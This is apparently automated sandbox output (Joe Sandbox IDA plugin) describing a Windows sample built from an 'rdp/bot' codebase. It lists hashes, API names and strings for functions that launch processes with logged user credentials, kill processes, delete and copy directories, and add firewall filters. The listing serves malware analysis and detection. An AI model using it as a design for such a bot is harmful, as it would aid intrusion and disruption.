                  • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                  • API String ID: 1842180197-3127737957
                  • Opcode ID: b8c7f51abbbad00766b63b972ff7788646e44901063f1b871291e187ee365b8b
                  • Instruction ID: a922217add82131f0a13fbd1e6544ab7bddd6c84e456b62fa8a0aca561662ad0
                  • Opcode Fuzzy Hash: b8c7f51abbbad00766b63b972ff7788646e44901063f1b871291e187ee365b8b
                  • Instruction Fuzzy Hash: A41249A1A0C686C1FA70AF07E4A03F9E290BF45784FD42137D94E46B94EF6CE645DB21
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                  • API String ID: 4253334766-1535167640
                  • Opcode ID: a56abdfbbd7eef0c8c2723d51d9ce088a74a472429bd005defaa61a22b691652
                  • Instruction ID: 2b5b769c4c8ee0d25c7004bf6d10caaf5ccbc9bf367f6c5aac35627038ed233a
                  • Opcode Fuzzy Hash: a56abdfbbd7eef0c8c2723d51d9ce088a74a472429bd005defaa61a22b691652
                  • Instruction Fuzzy Hash: D1610A21E0C553C5FA70BF1AA8D03B8E2606F04394FD46573E85E4BBE1EE6CA845DB61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                  • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                  • API String ID: 2123903355-2019010457
                  • Opcode ID: c66d0d2bf253c604d24e2eb69896048914559301695e6f6c54962ba82c94988b
                  • Instruction ID: a7c0f6cc182022f63b0058b12163d16718ef65df9dc6924879b3cc360810b226
                  • Opcode Fuzzy Hash: c66d0d2bf253c604d24e2eb69896048914559301695e6f6c54962ba82c94988b
                  • Instruction Fuzzy Hash: C9412275608242CADB60EF6AE4905A9BBE0FB08754F905237EA5C83794EF3CE545CF10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                  • API String ID: 384173800-4041758303
                  • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                  • Instruction ID: 9b08b8050728ceb7a1ef00843bf1562772c16b402668b25e0427148497a9c543
                  • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                  • Instruction Fuzzy Hash: E7F0BC24E4AA17D0EE05BF53FC800A4B3A4AF48785FC42137C80E02368EE6CA18AC720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fflushfwriteinet_addrntohl
                  • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                  • API String ID: 3255839625-58178811
                  • Opcode ID: 2033ac20ea33cc83e05537168d4012634626b8ec9451510fe05e8a1f1312e20c
                  • Instruction ID: 9a84a55d17951dded3daf14d957174ed1662671103cfbc28905cfdabdc80be35
                  • Opcode Fuzzy Hash: 2033ac20ea33cc83e05537168d4012634626b8ec9451510fe05e8a1f1312e20c
                  • Instruction Fuzzy Hash: 43518C3260CBC5C9E7319B29B4803DAB6A1EB95784F845129D6CC4BBA9EF3DC085CB50
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Time$FileSystem
                  • String ID:
                  • API String ID: 2086374402-0
                  • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                  • Instruction ID: 2a2b82302480748ddebdcd70e4ad0cbfb5dbef3ca29c5a415567da1a5763969e
                  • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                  • Instruction Fuzzy Hash: 65E092A6728D4583EF30DA1AE0807BBA791D79C794F946034E95DC3BA4EA2CD952CB40
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
                  • Instruction ID: 7246a1900f3a227d60006a9419afb491dd6fbf0193ee8755f40d1925b99d8c3b
                  • Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
                  • Instruction Fuzzy Hash: 5431948BE5DAD1CAEB526D650CE91646FD1ABA2B217CE407FCA48077C3B84D1C16D331
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                  • Instruction ID: 70324a246fb04341b71d40ee0256abe0e1e5145744551c046008c6126c6df09e
                  • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                  • Instruction Fuzzy Hash: B5A00212D8DC09C4EA441F01EC81171A528EB06700FC42135C028521559B2C9001C114
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                  • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                  • API String ID: 3326156344-4160762685
                  • Opcode ID: f36b7c31478ebaac28c746990784f070a11eaabb6d248c98853b6acce66a1a3f
                  • Instruction ID: c1fa14e8d31c4a2a1646debec534038e0f5f3c09e37f081584c36ee1c5501fc5
                  • Opcode Fuzzy Hash: f36b7c31478ebaac28c746990784f070a11eaabb6d248c98853b6acce66a1a3f
                  • Instruction Fuzzy Hash: BCF1F315E0C603C2FA74BF57A8E03F9D240AF14755EA43033CA0E4A3D6DD9EAD85DA62
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                  • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                  • API String ID: 2460052984-4087913290
                  • Opcode ID: 0fc17c46db865c1615c69aca4196e2e9f7880f0c7a1aa8583c36091478369d30
                  • Instruction ID: 14510061c3ccfce1e0f33eb3958e920ca709b63f1ca43de677f6b5ce12052370
                  • Opcode Fuzzy Hash: 0fc17c46db865c1615c69aca4196e2e9f7880f0c7a1aa8583c36091478369d30
                  • Instruction Fuzzy Hash: 34A18D21A0C682C5FA30BF17A5D43BAE391AF81345FD46033D94E86796EE3CE446CB25
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$strcatstrcpy$strcmp
                  • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                  • API String ID: 2140730755-3699962909
                  • Opcode ID: fad4b9403eb5c606afc846fb097ff816f2957a0621f72230effb5d2132d0abe6
                  • Instruction ID: 3beecf80fe3e0c0529ec596058e7d961ca53790e26ecab1f4bfbe2e64e28fdb3
                  • Opcode Fuzzy Hash: fad4b9403eb5c606afc846fb097ff816f2957a0621f72230effb5d2132d0abe6
                  • Instruction Fuzzy Hash: 78C16C61A0C692C1FA30AF17A5C43FAE251AF45388FD46037DA4D46B85EF6CE50ACF25
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                  • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                  • API String ID: 3826151639-1775164968
                  • Opcode ID: 38b010815dbec29c0c3ab1ed48cfa7f6bf299a92cfaca6f2c76bf7918cb94b74
                  • Instruction ID: 011a22c10354afea2d09727839591cfd8083e79592723ba99576f09e522b4dcd
                  • Opcode Fuzzy Hash: 38b010815dbec29c0c3ab1ed48cfa7f6bf299a92cfaca6f2c76bf7918cb94b74
                  • Instruction Fuzzy Hash: B2913A21E0C502C5FA70AF0BE4E47B9D652AF84795FD52037D54E87390EE3CE8869B61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                  • API String ID: 3629392964-1470975255
                  • Opcode ID: 7bfcbb9f52a8204b1055f7c977a7665a6fc2573a7bbac19e2ee08251f1f54cf5
                  • Instruction ID: 3d851669fa4374ae7adbd376ad1b7d68f669dd71aef7dcb6c373477aaaaab19b
                  • Opcode Fuzzy Hash: 7bfcbb9f52a8204b1055f7c977a7665a6fc2573a7bbac19e2ee08251f1f54cf5
                  • Instruction Fuzzy Hash: C9A1902260D7C2C5E771EF16A8803AAA7A1FB91780F445135EACC4BB99EF3DC084CB50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                  • API String ID: 2990311666-1793103013
                  • Opcode ID: d655908945121547b505d4462593f4d2a8dfa4c8ede1e33e152b5925720e049f
                  • Instruction ID: 043cdd30ba64dab6fd34a0f367d3a709992b1640b6d724cf53853cd1079178d0
                  • Opcode Fuzzy Hash: d655908945121547b505d4462593f4d2a8dfa4c8ede1e33e152b5925720e049f
                  • Instruction Fuzzy Hash: AA91C32260DBC2C5E771DF16A8803AAB7A1EB81740F945139EACC4BB99EF3DC145CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                  • API String ID: 1104438493-1059260517
                  • Opcode ID: dec58823f199da94fdba3867a4c4aec1f2d45fc7824aa0f1766a798ce2146470
                  • Instruction ID: 574cd0e3336efce759aa1932563429e39c9c21a68c2fff6213da747cac2a6fa3
                  • Opcode Fuzzy Hash: dec58823f199da94fdba3867a4c4aec1f2d45fc7824aa0f1766a798ce2146470
                  • Instruction Fuzzy Hash: E7719C11A0C643C1FB307F17E8C17B99651AF94748FD4A133C94E467A1EE2CE845CB29
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                  • API String ID: 1879646588-710610406
                  • Opcode ID: 9af93892f762c45f910c54bc40b85a44544f55378dbc750c1b1ffcf500798316
                  • Instruction ID: cafebd3f5a21eb3dc7c4479e2e34e50c7ade7dcab8529c8b71f860d3cfa64a76
                  • Opcode Fuzzy Hash: 9af93892f762c45f910c54bc40b85a44544f55378dbc750c1b1ffcf500798316
                  • Instruction Fuzzy Hash: 1C813A62E0C527C2FA32BF57F4C06B8D650AF00754F956073C85E57BA4EE2CAC818BA1
                  APIs
                  Strings
